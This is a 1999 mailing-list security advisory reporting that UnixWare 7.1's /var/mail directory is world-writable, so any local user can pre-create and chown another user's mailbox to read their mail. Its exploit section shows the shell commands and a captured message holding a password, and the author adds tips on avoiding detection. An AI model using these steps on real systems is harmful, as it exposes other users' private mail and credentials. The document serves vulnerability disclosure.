Date: Fri, 3 Dec 1999 21:03:43 MST
From: Brock Tellier <[email protected]>
To: [email protected]Subject: UnixWare read/modify users' mail
Greetings,
OVERVIEW
Any user can read/modify others' mail.
BACKGROUND
Only UnixWare 7.1 was tested.
DETAILS
Imagine my suprise when I saw that /var/mail was mode 777. As such, any
user may create a file called /var/mail/<username> with a mode readable by
him and trap all incoming mail. Afraid of getting caught? chown the file
to <username> (see my advisory on this subject), leaving it still
world-readable, and no one will ever know who did it.
All of this assumes, of course, that the user has not recieved any mail
yet. If you keep track of your /etc/passwd file, you can monitor for new
entries and create the files as needed.
This permissions problem obviously opens the door for all sorts of
problems with symlinks and such. I would imagine that some mail delivery
programs which aren't as smart as sendmail will follow symlinks in
/var/mail.
And as if all this wasn't bad enough, UnixWare's /usr/bin/mail is a BIG
LIE:
bash-2.02$ cat /usr/bin/mail
#!/bin/sh
cat > /dev/null
exit 0
bash-2.02$
;)
EXPLOIT
bash-2.02$ id
uid=106(xnec) gid=1(other)
bash-2.02$ pwd
/var/mail
bash-2.02$ touch btellier
bash-2.02$ chown btellier btellier
bash-2.02$ ls -la btellier
-rw-r--r-- 1 btellier other 0 Dec 4 07:54 btellier
Now wait for btellier to get some mail...
bash-2.02$ ls -la btellier
-rw-r--r-- 1 btellier other 410 Dec 4 07:55 btellier
bash-2.02$ cat btellier
From root Sat Dec 4 07:55:29 1999
Return-Path: root
Received: (from root@localhost) by localhost (8.8.7/UW7.1.0) id HAA04842
for btellier; Sat, 4 Dec 1999 07:55:29 -0600 (CST)
Date: Sat, 4 Dec 1999 07:55:29 -0600 (CST)
From: root@localhost
Message-Id: <199912041355.HAA04842@localhost>
Status:
X-Status:
X-SCO-PAD: XXXXXX
X-SCO-UID: 1
Content-Length: 52
your ueber-secure password on 0wned.com is a@f9;se0
bash-2.02$
Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
[email protected]
____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1
